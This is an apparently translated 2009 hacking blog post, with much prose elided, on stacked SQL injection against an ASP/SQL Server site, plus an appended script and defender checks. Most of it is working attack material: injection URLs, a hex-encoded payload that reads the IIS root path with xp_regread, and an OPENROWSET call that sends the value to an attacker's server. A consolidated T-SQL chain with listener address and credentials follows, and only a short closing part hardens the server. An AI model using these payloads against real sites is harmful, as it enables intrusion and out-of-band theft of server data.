Cross-site script injection: Cross-site SQL injection
Published: Saturday, 12 September 2009
By laokai (老凯), QQ 35054779
After filtering out [...] before [...]. The idea is as follows: [...]

Since this is still the research stage, [...]. SQL Server can connect to external [...]. So [...] try sp_addlinkedserver; if it succeeds, [...]. It reports that you must be sysadmin [...]. Switch to [...]: as long as your SQL Server dares to send a command over, [...]. So, considering [...]

[...]

DECLARE @result varchar(255)
exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CONTROLSet001\Services\W3SVC\Parameters\Virtual Roots', '/' ,@result output
insert [...]

What does this code do? It takes the website's [...]

SELECT a.* FROM OPENROWSET('SQLOLEDB','your [...]

where [...]

DECLARE @a1 char(255) [...]

This is equivalent to executing SELECT a.* FROM OPENROWSET('SQLOLEDB','your [...]. This [...]

SELECT * FROM pubs.dbo.authors where au_fname='C:\Inetpub,,1'

where [...]

Now on to the practical stage. [...]

a.asp?id=1;create table [dbo].[laokai]([cha8][char](255))--

This returns normally; we have created [...]

a.asp?id=1;DECLARE @result varchar(255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CONTROLSet001\Services\W3SVC\Parameters\Virtual Roots', '/' ,@result output insert [...]

That errored out. [...] So I wrote [...]
a.asp?id=1;%44%45%43%4C%41%52%45%20%40%72%65%73%75%6C%74%20%76%61%72%63%68%61%72%28%32%35%35%29%20%65%78%65%63%20%6D%61%73%74%65%72%2E%64%62%6F%2E%78%70%5F%72%65%67%72%65%61%64%20%27%48%4B%45%59%5F%4C%4F%43%41%4C%5F%4D%41%43%48%49%4E%45%27%2C%27%53%59%53%54%45%4D%5C%43%4F%4E%54%52%4F%4C%53%65%74%30%30%31%5C%53%65%72%76%69%63%65%73%5C%57%33%53%56%43%5C%50%61%72%61%6D%65%74%65%72%73%5C%56%69%72%74%75%61%6C%20%52%6F%6F%74%73%27%2C%20%27%2F%27%20%2C%40%72%65%73%75%6C%74%20%6F%75%74%70%75%74%20%69%6E%73%65%72%74%20%69%6E%74%6F%20%6C%61%6F%6B%61%69%20%28%63%68%61%38%29%20%76%61%6C%75%65%73%28%27%53%45%4C%45%43%54%20%61%2E%2A%20%46%52%4F%4D%20%4F%50%45%4E%52%4F%57%53%45%54%28%27%27%53%51%4C%4F%4C%45%44%42%27%27%2C%27%27%3F%3F%49%50%27%27%3B%27%27%73%61%27%27%3B%27%27%3F%3F%27%27%2C%20%27%27%53%45%4C%45%43%54%20%2A%20%46%52%4F%4D%20%70%75%62%73%2E%64%62%6F%2E%61%75%74%68%6F%72%73%20%77%68%65%72%65%20%61%75%5F%66%6E%61%6D%65%3D%27%27%27%27%27%20%2B%20%40%72%65%73%75%6C%74%20%2B%20%27%27%27%27%27%27%27%29%41%53%20%61%27%29%3B%2D%2D%20

Decoded, the injected statement is:

DECLARE @result varchar(255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CONTROLSet001\Services\W3SVC\Parameters\Virtual Roots', '/' ,@result output insert into laokai (cha8) values('SELECT a.* FROM OPENROWSET(''SQLOLEDB'',''??IP'';''sa'';''??'', ''SELECT * FROM pubs.dbo.authors where au_fname=''''' + @result + ''''''')AS a');--

(??IP and ?? stand for the receiving server's address and password, the "your ..." values referred to earlier.)

Executed successfully. [...]

a.asp?id=1;DECLARE @a1 char(255) [...]

The website still displays its normal page [...]. Injection successful. [...]

Finally, an explanation [...] of the ''SELECT * FROM pubs.dbo.authors where au_fname=''''' + @result + ''''''' part [...]. Quotes are doubled once per level of nesting: every ' that must end up inside the stored OPENROWSET text is written '' in the INSERT, and the query string that OPENROWSET hands to the remote server needs its own quotes around the value, which is why five quotes precede @result and seven follow it. On the remote side the value arrives as au_fname='C:\Inetpub,,1', the statement shown earlier.
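To make the chain concrete, here is the whole procedure the post walks through written out as one T-SQL script, followed by the checks a defender runs against the same primitives. This is an added example, not code from the original post. It assumes a disposable SQL Server of the 2000/2005 era with the pubs sample database, a listening server at 192.0.2.10 with login sa and password Pa55w0rd (all assumptions standing in for the post's "your ..." values), and a default instance for the registry path in the last comment.

```sql
-- Added example (not from the original post): the full chain as one script,
-- then the checks that shut each primitive it relies on.
-- Assumptions: a disposable SQL Server with the pubs sample database; the
-- attacker-side listener is 192.0.2.10 with login sa / password Pa55w0rd.

-- Stage 1: the injected CREATE TABLE. One char(255) column is enough to
-- park a single statement between two requests.
CREATE TABLE [dbo].[laokai] ([cha8] [char](255));
GO

-- Stage 2: read the registry value, then store an OPENROWSET statement that
-- carries it. OPENROWSET takes string literals only, so @result cannot be
-- spliced into it directly; the statement is built as text instead.
DECLARE @result varchar(255);
EXEC master.dbo.xp_regread
    'HKEY_LOCAL_MACHINE',
    'SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots',
    '/',
    @result OUTPUT;      -- IIS root mapping, e.g. the "C:\Inetpub,,1" the post shows
-- If the read is refused, @result stays NULL and the whole concatenation is NULL.
IF @result IS NULL
    SET @result = 'xp_regread returned nothing';
INSERT INTO laokai (cha8)
VALUES ('SELECT a.* FROM OPENROWSET(''SQLOLEDB'',''192.0.2.10'';''sa'';''Pa55w0rd'', '
      + '''SELECT * FROM pubs.dbo.authors WHERE au_fname=''''' + @result + ''''''') AS a');
GO

-- What now sits in laokai.cha8, with the value from the post (quotes un-doubled once):
--   SELECT a.* FROM OPENROWSET('SQLOLEDB','192.0.2.10';'sa';'Pa55w0rd',
--     'SELECT * FROM pubs.dbo.authors WHERE au_fname=''C:\Inetpub,,1''') AS a

-- Stage 3: the injected DECLARE @a1: fetch the text and execute it. The
-- remote server receives the inner query with the value in its WHERE clause;
-- no rows need to come back, the outbound connection itself is the channel.
DECLARE @a1 char(255);
SELECT @a1 = cha8 FROM laokai;
EXEC (@a1);
GO

-- Defender's side: run these as the web application's login.
USE master;
GO
-- (1) sp_addlinkedserver needs sysadmin; ad hoc OPENROWSET on SQL Server 2000
--     does not. 1 here means the app login can do everything else as well.
SELECT IS_SRVROLEMEMBER('sysadmin') AS app_login_is_sysadmin;

-- (2) Can the login read the registry at all? (SQL Server 2005 and later.)
SELECT HAS_PERMS_BY_NAME('master.dbo.xp_regread', 'OBJECT', 'EXECUTE') AS can_xp_regread;
--     Close it on any version:
REVOKE EXECUTE ON dbo.xp_regread FROM public;

-- (3) Are ad hoc distributed queries enabled? SQL Server 2005 and later ship
--     with the option off; show it, then force it off.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'Ad Hoc Distributed Queries';      -- config_value should be 0
EXEC sp_configure 'Ad Hoc Distributed Queries', 0;
RECONFIGURE;
--     SQL Server 2000 has no such option: set the per-provider registry value
--     HKLM\SOFTWARE\Microsoft\MSSQLServer\Providers\SQLOLEDB\DisallowAdhocAccess
--     to 1 (default instance path) and block outbound TCP/1433 from the host.
GO
```

The attack stages run as three separate batches because that is how they arrive through a.asp?id=1;... in the post: the table, the stored text, and the EXEC are three requests. With no listener at 192.0.2.10 stage 3 simply errors after the connection timeout, which is also the observable to watch for on a real host: an outbound TCP/1433 connection from the database server that nobody provisioned.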